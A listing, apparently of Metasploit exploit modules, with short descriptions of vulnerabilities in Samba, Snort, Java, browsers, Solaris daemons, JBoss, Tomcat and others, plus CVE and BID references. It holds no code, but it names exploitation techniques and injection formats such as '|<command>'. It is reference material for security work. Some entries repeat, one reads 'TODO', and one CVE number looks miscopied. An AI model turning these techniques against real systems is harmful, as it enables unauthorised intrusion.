This module exploits a stack buffer overflow in the Back Orifice pre-processor module included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could be used to completely compromise a Snort sensor, and would typically gain an attacker full root or administrative privileges.
CVE-2005-3252
OSVDB-20034
BID-15131
http://xforce.iss.net/xforce/...
UoW IMAP server LSUB Buffer Overflow
This module exploits a buffer overflow in the 'LSUB' command of the University of Washington IMAP service. This vulnerability can only be exploited with a valid username and password.
CVE-2000-0284
OSVDB-12037
BID-1110
http://www.milw0rm.com/exploi...
Madwifi SIOCGIWSCAN Buffer Overflow
The Madwifi driver under Linux is vulnerable to a remote kernel-mode stack-based buffer overflow. The vulnerability is triggered by one of these properly crafted information element: WPA, RSN, WME and Atheros OUI Current madwifi driver (0.9.2) and and all madwifi-ng drivers since r1504 are vulnerable Madwifi 0.9.2.1 release corrects the issue. This module has been tested against Ubuntu 6.10 and is 100% reliable, doesn\'t crash the Wifi stack and can exploit the same machine multiple time without the need to reboot it. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.
CVE-2006-6332
OSVDB-31267
http://www.madwifi.org
GLD (Greylisting Daemon) Postfix Buffer Overflow
This module exploits a stack buffer overflow in the Salim Gasmi GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten.
CVE-2005-1099
OSVDB-15492
BID-13129
http://www.milw0rm.com/exploi...
hplip hpssd.py From Address Arbitrary Command Execution
This module exploits a command execution vulnerable in the hpssd.py daemon of the Hewlett-Packard Linux Imaging and Printing Project. According to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable. This module was written and tested using the Fedora 6 Linux distribution. On the test system, the daemon listens on localhost only and runs with root privileges. Although the configuration shows the daemon is to listen on port 2207, it actually listens on a dynamic port. NOTE: If the target system does not have a 'sendmail' command installed, this vulnerability cannot be exploited.
CVE-2007-5208
OSVDB-41693
BID-26054
https://bugzilla.redhat.com/s...
https://bugzilla.redhat.com/a...
Borland InterBase INET_connect() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request.
CVE-2007-5243
OSVDB-38605
BID-25917
http://www.risesecurity.org/a...
Borland InterBase jrd8_create_database() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.
CVE-2007-5243
OSVDB-38606
BID-25917
http://www.risesecurity.org/a...
Borland InterBase open_marker_file() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request.
CVE-2007-5244
OSVDB-38610
BID-25917
http://www.risesecurity.org/a...
Borland InterBase PWD_db_aliased() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request.
CVE-2007-5243
OSVDB-38607
BID-25917
http://www.risesecurity.org/a...
LPRng use_syslog Remote Format String Vulnerability
This module exploits a format string vulnerability in the LPRng print server. This vulnerability was discovered by Chris Evans. There was a publicly circulating worm targeting this vulnerability, which prompted RedHat to pull their 7.0 release. They consequently re-released it as "7.0-respin".
CVE-2000-0917
OSVDB-421
BID-1712
US-CERT-VU-382365
http://www.cert.org/advisorie...
https://bugzilla.redhat.com/s...
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
MySQL yaSSL CertDecoder::GetName Buffer Overflow
This module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier) implementation bundled with MySQL. By sending a specially crafted client certificate, an attacker can execute arbitrary code. This vulnerability is present within the CertDecoder::GetName function inside "taocrypt/src/asn.cpp". However, the stack buffer that is written to exists within a parent function's stack frame. NOTE: This vulnerability requires a non-default configuration. First, the attacker must be able to pass the host-based authentication. Next, the server must be configured to listen on an accessible network interface. Lastly, the server must have been manually configured to use SSL. The binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing on Windows XP SP3, these protections successfully prevented exploitation. Testing was also done with mysql on Ubuntu 9.04. Although the vulnerable code is present, both version 5.5.0-m2 built from source and version 5.0.75 from a binary package were not exploitable due to the use of the compiler's FORTIFY feature. Although suse11 was mentioned in the original blog post, the binary package they provide does not contain yaSSL or support SSL.
CVE-2009-4484
BID-37640
BID-37943
BID-37974
OSVDB-61956
http://secunia.com/advisories...
http://intevydis.blogspot.com...
MySQL yaSSL SSL Hello Message Buffer Overflow
This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier) implementation bundled with MySQL <= 6.0. By sending a specially crafted Hello packet, an attacker may be able to execute arbitrary code.
CVE-2008-0226
OSVDB-41195
BID-27140
Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
This exploit takes advantage of a stack based overflow. Once the stack corruption has occured it is possible to overwrite a pointer which is later used for a memcpy. This gives us a write anything anywhere condition similar to a format string vulnerability. NOTE: The popsubfolders option is a non-default setting. I chose to overwrite the GOT with my shellcode and return to it. This defeats the VA random patch and possibly other stack protection features. Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with a version containing the vulnerable code, it is not exploitable due to the use of the FORTIFY_SOURCE compiler enhancement
CVE-2006-2502
OSVDB-25853
BID-18056
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
http://archives.neohapsis.com...
Poptop Negative Read Overflow
This is an exploit for the Poptop negative read overflow. This will work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I currently do not have a good way to detect Poptop versions. The server will by default only allow 4 concurrent manager processes (what we run our code in), so you could have a max of 4 shells at once. Using the current method of exploitation, our socket will be closed before we have the ability to run code, preventing the use of Findsock.
CVE-2003-0213
OSVDB-3293
http://securityfocus.com/arch...
http://www.freewebs.com/bligh...
Squid NTLM Authenticate Overflow
This is an exploit for Squid\'s NTLM authenticate overflow (libntlmssp.c). Due to improper bounds checking in ntlm_check_auth, it is possible to overflow the 'pass' variable on the stack with user controlled data of a user defined length. Props to iDEFENSE for the advisory.
CVE-2004-0541
OSVDB-6791
http://www.idefense.com/appli...
BID-10500
Samba chain_reply Memory Corruption (Linux x86)
This exploits a memory corruption vulnerability present in Samba versions prior to 3.3.13. When handling chained response packets, Samba fails to validate the offset value used when building the next part. By setting this value to a number larger than the destination buffer size, an attacker can corrupt memory. Additionally, setting this value to a value smaller than 'smb_wct' (0x24) will cause the header of the input buffer chunk to be corrupted. After close inspection, it appears that 3.0.x versions of Samba are not exploitable. Since they use an "InputBuffer" size of 0x20441, an attacker cannot cause memory to be corrupted in an exploitable way. It is possible to corrupt the heap header of the "InputBuffer", but it didn't seem possible to get the chunk to be processed again prior to process exit. In order to gain code execution, this exploit attempts to overwrite a "talloc chunk" desctructor function pointer. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the nx memory protection. NOTE: It is possible to make exploitation attempts indefinitely since Samba forks for user sessions in the default configuration.
CVE-2010-2063
OSVDB-65518
http://labs.idefense.com/inte...
Samba lsa_io_trans_names Heap Overflow
This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. Additonally, this module will not work when the Samba "log level" parameter is higher than "2".
CVE-2007-2446
OSVDB-34699
Samba trans2open Overflow (Linux x86)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC.
CVE-2003-0201
OSVDB-4469
BID-7294
http://seclists.org/bugtraq/2...
Firefox 3.5 escape() Return Value Memory Corruption
This module exploits a memory corruption vulnerability in the Mozilla Firefox browser. This flaw occurs when a bug in the javascript interpreter fails to preserve the return value of the escape() function and results in uninitialized memory being used instead. This module has only been tested on Windows, but should work on other platforms as well with the current targets.
CVE-2009-2477
OSVDB-55846
BID-35660
https://bugzilla.mozilla.org/...
Firefox location.QueryInterface() Code Execution
This module exploits a code execution vulnerability in the Mozilla Firefox browser. To reliably exploit this vulnerability, we need to fill almost a gigabyte of memory with our nop sled and payload. This module has been tested on OS X 10.3 with the stock Firefox 1.5.0 package.
CVE-2006-0295
OSVDB-22893
BID-16476
http://www.mozilla.org/securi...
Apple OS X iTunes 8.1.1 ITMS Overflow
This modules exploits a stack-based buffer overflow in iTunes itms:// URL parsing. It is accessible from the browser and in Safari, itms urls will be opened in iTunes automatically. Because iTunes is multithreaded, only vfork-based payloads should be used.
CVE-2009-0950
OSVDB-54833
http://support.apple.com/kb/H...
http://redpig.dataspill.org/2...
Sun Java Calendar Deserialization Exploit
This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).
CVE-2008-5353
OSVDB-50500
http://slightlyrandombrokenth...
http://landonf.bikemonkey.org...
http://blog.cr0.org/2009/05/w...
http://sunsolve.sun.com/searc...
Sun Java JRE getSoundbank file:// URI Buffer Overflow
This module exploits a flaw in the getSoundbank function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
CVE-2009-3867
OSVDB-59711
BID-36881
http://zerodayinitiative.com/...
Sun Java JRE AWT setDiffICM Buffer Overflow
This module exploits a flaw in the setDiffICM function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
CVE-2009-3869
OSVDB-59710
BID-36881
http://sunsolve.sun.com/searc...
http://www.zerodayinitiative....
Signed Applet Social Engineering Code Exec
This exploit dynamically creates an applet via the Msf::Exploit::Java mixin, converts it to a .jar file, then signs the .jar with a dynamically created certificate containing values of your choosing. This is presented to the end user via a web page with an applet tag, loading the signed applet. The user's JVM pops a dialog asking if they trust the signed applet and displays the values chosen. Once the user clicks 'accept', the applet executes with full user permissions. The java payload used in this exploit is derived from Stephen Fewer's and HDM's payload created for the CVE-2008-5353 java deserialization exploit. This module requires the rjb rubygem, the JDK, and the $JAVA_HOME variable to be set. If these dependencies are not present, the exploit falls back to a static, signed JAR.
http://www.defcon.org/images/...
Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit module is a direct port of Aviv Raff's HTML PoC.
CVE-2005-2265
OSVDB-17968
BID-14242
http://www.mozilla.org/securi...
Mozilla Suite/Firefox Navigator Object Code Execution
This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit requires the Java plugin to be installed.
CVE-2006-3677
OSVDB-27559
BID-19192
http://www.mozilla.org/securi...
http://browserfun.blogspot.co...
Opera 9 Configuration Overwrite
Opera web browser in versions <= 9.10 allows unrestricted script access to its configuration page, opera:config, allowing an attacker to change settings and potentially execute arbitrary code.
OSVDB-66472
Opera historysearch XSS
Certain constructs are not escaped correctly by Opera's History Search results. These can be used to inject scripts into the page, which can then be used to modify configuration settings and execute arbitrary commands. Affects Opera versions between 9.50 and 9.61.
CVE-2008-4696
OSVDB-49472
BID-31869
http://www.opera.com/support/...
Apple QTJava toQTPointer() Arbitrary Memory Access
This module exploits an arbitrary memory access vulnerability in the Quicktime for Java API provided with Quicktime 7.
CVE-2007-2175
OSVDB-34178
BID-23608
http://www.zerodayinitiative....
Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.4, < 8.1.7, and < 9.2. By creating a specially crafted pdf that a contains malformed U3D data, an attacker may be able to execute arbitrary code.
CVE-2009-2990
OSVDB-58920
BID-36665
http://sites.google.com/site/...
http://www.adobe.com/support/...
Maple Maplet File Creation and Command Execution
This module harnesses Maple's ability to create files and execute commands automatically when opening a Maplet. All versions up to 13 are suspected vulnerable. Testing was conducted with version 13 on Windows. Standard security settings prevent code from running in a normal maple worksheet without user interaction, but those setting do not prevent code in a Maplet from running. In order for the payload to be executed, an attacker must convince someone to open a specially modified .maplet file with Maple. By doing so, an attacker can execute arbitrary code as the victim user.
OSVDB-64541
http://www.maplesoft.com/prod...
PeaZip <= 2.6.1 Zip Processing Command Injection
This module exploits a command injection vulnerability in PeaZip. All versions prior to 2.6.2 are suspected vulnerable. Testing was conducted with version 2.6.1 on Windows. In order for the command to be executed, an attacker must convince someone to open a specially crafted zip file with PeaZip, and access the specially file via double-clicking it. By doing so, an attacker can execute arbitrary commands as the victim user.
CVE-2009-2261
OSVDB-54966
http://peazip.sourceforge.net/
http://www.exploit-db.com/exp...
wu-ftpd SITE EXEC/INDEX Format String Vulnerability
This module exploits a format string vulnerability in versions of the Washington University FTP server older than 2.6.1. By executing specially crafted SITE EXEC or SITE INDEX commands containing format specifiers, an attacker can corrupt memory and execute arbitrary code.
CVE-2000-0573
OSVDB-11805
BID-1387
Generic Payload Handler
This module is a stub that provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework.
JBoss JMX Console Beanshell Deployer WAR upload and deployment
This module can be used to install a WAR file payload on JBoss servers that have an exposed "jmx-console" application. The payload is put on the server by using the jboss.system:BSHDeployer's createScriptDeployment() method.
CVE-2010-0738
http://www.redteam-pentesting...
JBoss Java Class DeploymentFileRepository WAR deployment
This module uses the DeploymentFileRepository class in JBoss Application Server (jbossas) to deploy a JSP file in a minimal WAR context.
CVE-2010-0738
http://www.redteam-pentesting...
JBoss JMX Console Deployer Upload and Execute
This module can be used to execute a payload on JBoss servers that have an exposed "jmx-console" application. The payload is put on the server by using the jboss.system:MainDeployer functionality. To accomplish this, a temporary HTTP server is created to serve a WAR archive containing our payload. This method will only work if the target server allows outbound connections to us.
CVE-2007-1036
CVE-2010-0738
OSVDB-33744
http://www.redteam-pentesting...
Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
This module exploits a buffer overflow in Sun Java Web Server prior to version 7 Update 8. By sending an "OPTIONS" request with an overly long path, attackers can execute arbitrary code. In order to reach the vulnerable code, the attacker must also specify the path to a directory with WebDAV enabled. This exploit was tested and confirmed to work on Windows XP SP3 without DEP. Versions for other platforms are vulnerable as well. The vulnerability was originally discovered and disclosed by Evgeny Legerov of Intevydis.
CVE-2010-0361
OSVDB-61851
http://intevydis.blogspot.com...
http://sunsolve.sun.com/searc...
Apache Tomcat Manager Application Deployer Upload and Execute
This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module.
CVE-2009-3843
OSVDB-60317
CVE-2009-4189
OSVDB-60670
CVE-2009-4188
CVE-2009-3548
OSVDB-60176
BID-36954
http://tomcat.apache.org/tomc...
HP OpenView OmniBack II Command Execution
This module uses a vulnerability in the OpenView Omniback II service to execute arbitrary commands. This vulnerability was discovered by DiGiT and his code was used as the basis for this module. For Microsoft Windows targets, due to module limitations, use the "unix/cmd/generic" payload and set CMD to your command. You can only pass a small amount of characters (4) to the command line on Windows.
CVE-2001-0311
OSVDB-6018
BID-11032
http://www.securiteam.com/exp...
VERITAS NetBackup Remote Command Execution
This module allows arbitrary command execution on an ephemeral port opened by Veritas NetBackup, whilst an administrator is authenticated. The port is opened and allows direct console access as root or SYSTEM from any source address.
CVE-2004-1389
OSVDB-11026
BID-11494
http://seer.support.veritas.c...
Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.
CVE-2010-0304
OSVDB-61987
BID-37985
http://www.wireshark.org/secu...
http://anonsvn.wireshark.org/...
Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue. This version loops, sending the packet every X seconds until the job is killed.
CVE-2010-0304
OSVDB-61987
BID-37985
http://www.wireshark.org/secu...
http://anonsvn.wireshark.org/...
NTP daemon readvar Buffer Overflow
This module exploits a stack based buffer overflow in the ntpd and xntpd service. By sending an overly long 'readvar' request it is possible to execute code remotely. As the stack is corrupted, this module uses the Egghunter technique.
CVE-2001-0414
OSVDB-805
BID-2540
US-CERT-VU-970472
PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)
This module exploits an integer overflow vulnerability in the unserialize() function of the PHP web server extension. This vulnerability was patched by Stefan in version 4.5.0 and applies all previous versions supporting this function. This particular module targets numerous web applications and is based on the proof of concept provided by Stefan Esser. This vulnerability requires approximately 900k of data to trigger due the multiple Cookie headers requirement. Since we are already assuming a fast network connection, we use a 2Mb block of shellcode for the brute force, allowing quick exploitation for those with fast networks. One of the neat things about this vulnerability is that on x86 systems, the EDI register points into the beginning of the hashtable string. This can be used with an egghunter to quickly exploit systems where the location of a valid "jmp EDI" or "call EDI" instruction is known. The EDI method is faster, but the bandwidth-intensive brute force used by this module is more reliable across a wider range of systems.
CVE-2007-1286
OSVDB-32771
http://www.php-security.org/M...
RealServer Describe Buffer Overflow
This module exploits a buffer overflow in RealServer 7/8/9 and was based on Johnny Cyberpunk's THCrealbad exploit. This code should reliably exploit Linux, BSD, and Windows-based servers.
CVE-2002-1643
OSVDB-4468
http://lists.immunitysec.com/...
Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
This module attempts to exploit a buffer overflow vulnerability present in versions 2.2.2 through 2.2.6 of Samba. The Samba developers report this as: "Bug in the length checking for encrypted password change requests from clients." The bug was discovered and reported by the Debian Samba Maintainers.
CVE-2003-0085
OSVDB-6323
BID-7106
http://www.samba.org/samba/hi...
Samba "username map script" Command Execution
This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!
CVE-2007-2447
OSVDB-34700
BID-23972
http://labs.idefense.com/inte...
http://samba.org/samba/securi...
Subversion Date Svnserve
This is an exploit for the Subversion date parsing overflow. This exploit is for the svnserve daemon (svn:// protocol) and will not work for Subversion over webdav (http[s]://). This exploit should never crash the daemon, and should be safe to do multi-hits. **WARNING** This exploit seems to (not very often, I've only seen it during testing) corrupt the subversion database, so be careful!
CVE-2004-0397
OSVDB-6301
BID-10386
http://lists.netsys.com/piper...
MIL-68
Wyse Rapport Hagent Fake Hserver Command Execution
This module exploits the Wyse Rapport Hagent service by pretending to be a legitimate server. This process involves starting both HTTP and FTP services on the attacker side, then contacting the Hagent service of the target and indicating that an update is available. The target will then download the payload wrapped in an executable from the FTP service.
CVE-2009-0695
OSVDB-55839
US-CERT-VU-654545
http://snosoft.blogspot.com/
http://www.theregister.co.uk/...
http://www.wyse.com/servicean...
http://www.wyse.com/servicean...
Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow
This module exploits a stack buffer overflow in the NetWare CIFS.NLM driver. Since the driver runs in the kernel space, a failed exploit attempt can cause the OS to reboot.
CVE-2005-2852
OSVDB-12790
AppleFileServer LoginExt PathName Overflow
This module exploits a stack buffer overflow in the AppleFileServer service on MacOS X. This vulnerability was originally reported by Atstake and was actually one of the few useful advisories ever published by that company. You only have one chance to exploit this bug. This particular exploit uses a stack-based return address that will only work under optimal conditions.
CVE-2004-0430
OSVDB-5762
BID-10271
Arkeia Backup Client Type 77 Overflow (Mac OS X)
This module exploits a stack buffer overflow in the Arkeia backup client for the Mac OS X platform. This vulnerability affects all versions up to and including 5.3.3 and has been tested with Arkeia 5.3.1 on Mac OS X 10.3.5.
CVE-2005-0491
OSVDB-14011
BID-12594
http://lists.netsys.com/piper...
iPhone MobileSafari LibTIFF Buffer Overflow
This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload.
CVE-2006-3459
OSVDB-27723
BID-19283
iPhone MobileSafari LibTIFF Buffer Overflow
This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload.
CVE-2006-3459
OSVDB-27723
BID-19283
Safari Archive Metadata Command Execution
This module exploits a vulnerability in Safari's "Safe file" feature, which will automatically open any file with one of the allowed extensions. This can be abused by supplying a zip file, containing a shell script, with a metafile indicating that the file should be opened by Terminal.app. This module depends on the 'zip' command-line utility.
CVE-2006-0848
OSVDB-23510
BID-16736
Apple OS X Software Update Command Execution
This module exploits a feature in the Distribution Packages, which are used in the Apple Software Update mechanism. This feature allows for arbitrary command execution through JavaScript. This exploit provides the malicious update server. Requests must be redirected to this server by other means for this exploit to work.
CVE-2007-5863
OSVDB-40722
Mail.app Image Attachment Command Execution
This module exploits a command execution vulnerability in the Mail.app application shipped with Mac OS X 10.5.0. This flaw was patched in 10.4 in March of 2007, but reintroduced into the final release of 10.5.
CVE-2006-0395
CVE-2007-6165
OSVDB-40875
BID-26510
BID-16907
iPhone MobileMail LibTIFF Buffer Overflow
This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload.
CVE-2006-3459
OSVDB-27723
BID-19283
WebSTAR FTP Server USER Overflow
This module exploits a stack buffer overflow in the logging routine of the WebSTAR FTP server. Reliable code execution is obtained by a series of hops through the System library.
CVE-2004-0695
OSVDB-7794
BID-10720
MacOS X EvoCam HTTP GET Buffer Overflow
This module exploits a stack buffer overflow in the web server provided with the EvoCam program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6, 3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerablity.
CVE-2010-2309
OSVDB-65043
http://www.exploit-db.com/exp...
Mac OS X mDNSResponder UPnP Location Overflow
TODO
UFO: Alien Invasion IRC Client Buffer Overflow Exploit
This module exploits a buffer overflow in the IRC client component of UFO: Alien Invasion 2.2.1.
CVE-2010-2309
OSVDB-65689
http://www.exploit-db.com/exp...
MacOS X QuickTime RTSP Content-Type Overflow
Samba lsa_io_trans_names Heap Overflow
This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the szone_free() to overwrite the size() or free() pointer in initial_malloc_zones structure.
CVE-2007-2446
OSVDB-34699
Samba trans2open Overflow (Mac OS X PPC)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems.
CVE-2003-0201
OSVDB-4469
BID-7294
http://seclists.org/bugtraq/2...
Solaris dtspcd Heap Overflow
This is a port of noir's dtspcd exploit. This module should work against any vulnerable version of Solaris 8 (sparc). The original exploit code was published in the book Shellcoder's Handbook.
CVE-2001-0803
OSVDB-4503
BID-3517
http://www.cert.org/advisorie...
http://media.wiley.com/produc...
Solaris LPD Command Execution
This module exploits an arbitrary command execution flaw in the in.lpd service shipped with all versions of Sun Solaris up to and including 8.0. This module uses a technique discovered by Dino Dai Zovi to exploit the flaw without needing to know the resolved name of the attacking system.
CVE-2001-1583
OSVDB-15131
BID-3274
Samba lsa_io_trans_names Heap Overflow
This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. Additionally, this module will not work when the Samba "log level" parameter is higher than "2".
CVE-2007-2446
OSVDB-34699
Samba trans2open Overflow (Solaris SPARC)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on Solaris SPARC systems that do not have the noexec stack option set. Big thanks to MC and valsmith for resolving a problem with the beta version of this module.
CVE-2003-0201
OSVDB-4469
BID-7294
http://seclists.org/bugtraq/2...
Sun Solaris sadmind adm_build_path() Buffer Overflow
This module exploits a buffer overflow vulnerability in adm_build_path() function of sadmind daemon. The distributed system administration daemon (sadmind) is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations. The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received. The sadmind daemon process continues to run for 15 minutes after the last request is completed, unless a different idle-time is specified with the -i command line option. The sadmind daemon may be started independently from the command line, for example, at system boot time. In this case, the -i option has no effect; sadmind continues to run, even if there are no active requests.
CVE-2008-4556
OSVDB-49111
http://risesecurity.org/advis...
Solaris sadmind Command Execution
This exploit targets a weakness in the default security settings of the sadmind RPC application. This server is installed and enabled by default on most versions of the Solaris operating system. Vulnerable systems include solaris 2.7, 8, and 9
CVE-2003-0722
OSVDB-4585
BID-8615
http://lists.insecure.org/lis...
Solaris ypupdated Command Execution
This exploit targets a weakness in the way the ypupdated RPC application uses the command shell when handling a MAP UPDATE request. Extra commands may be launched through this command shell, which runs as root on the remote host, by passing commands in the format '|<command>'. Vulnerable systems include Solaris 2.7, 8, 9, and 10, when ypupdated is started with the '-i' command-line option.
CVE-1999-0209
OSVDB-11517
BID-1749
Sun Solaris Telnet Remote Authentication Bypass Vulnerability
This module exploits the argument injection vulnerabilty in the telnet daemon (in.telnetd) of Solaris 10 and 11.
CVE-2007-0882
OSVDB-31881
BID-22512
Solaris in.telnetd TTYPROMPT Buffer Overflow
This module uses a buffer overflow in the Solaris 'login' application to bypass authentication in the telnet daemon.
CVE-2001-0797
OSVDB-690
BID-5531
Internal Aggressive Test Exploit
This module tests the exploitation of a test service.
Command Stager Web Test
This module tests the command stager mixin against a shell.jsp application installed on an Apache Tomcat server.
Test Dialup Exploit
This exploit connects to a system's modem over dialup and provides the user with a readout of the login banner.
MIPS Aggressive Test Exploit
This module tests the exploitation of a test service
Internal Kernel-mode Test Exploit
This module tests the exploitation of a kernel-mode test service.
ContentKeeper Web Remote Command Execution
This module exploits the ContentKeeper Web Appliance. Versions prior to 125.10 are affected. This module exploits a combination of weaknesses to enable remote command execution as the Apache user. Following exploitation it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool' to escalate to root.
OSVDB-54551
OSVDB-54552
http://www.aushack.com/200904...
UnrealIRCD 3.2.8.1 Backdoor Command Execution
This module uses exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
CVE-2010-2075
OSVDB-65445
http://www.unrealircd.com/txt...
DistCC Daemon Command Execution
This module uses a documented security weakness to execute arbitrary commands on any system running distccd.
CVE-2004-2687
OSVDB-13378
http://distcc.samba.org/secur...
SpamAssassin spamd Remote Command Execution
This module exploits a flaw in the SpamAssassin spamd service by specifying a malicious vpopmail User header, when running with vpopmail and paranoid modes enabled (non-default). Versions prior to v3.1.3 are vulnerable
CVE-2006-2447
OSVDB-26177
BID-18290
http://spamassassin.apache.or...
Zabbix Agent net.tcp.listen Command Injection
This module exploits a metacharacter injection vulnerability in the FreeBSD and Solaris versions of the Zabbix agent. This flaw can only be exploited if the attacker can hijack the IP address of an authorized server (as defined in the configuration file).
CVE-2009-4502
OSVDB-60956
https://support.zabbix.com/br...
ClamAV Milter Blackhole-Mode Remote Code Execution
This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter' (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable. When implemented with black hole mode enabled, it is possible to execute commands remotely due to an insecure popen call.
CVE-2007-4560
OSVDB-36909
BID-25439
http://www.milw0rm.com/exploi...
AWStats configdir Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2 are vulnerable.
CVE-2005-0116
OSVDB-13002
BID-12298
http://www.idefense.com/appli...
AWStats migrate Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based payloads are recommended with this module. The vulnerability is only present when AllowToUpdateStatsFromBrowser is enabled in the AWstats configuration file (non-default).
CVE-2006-2237
OSVDB-25284
BID-17844
http://awstats.sourceforge.ne...
http://www.milw0rm.com/exploi...
Barracuda IMG.PL Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable.
CVE-2005-2847
OSVDB-19279
BID-14712
NSS-19556
http://www.securiweb.net/wiki...
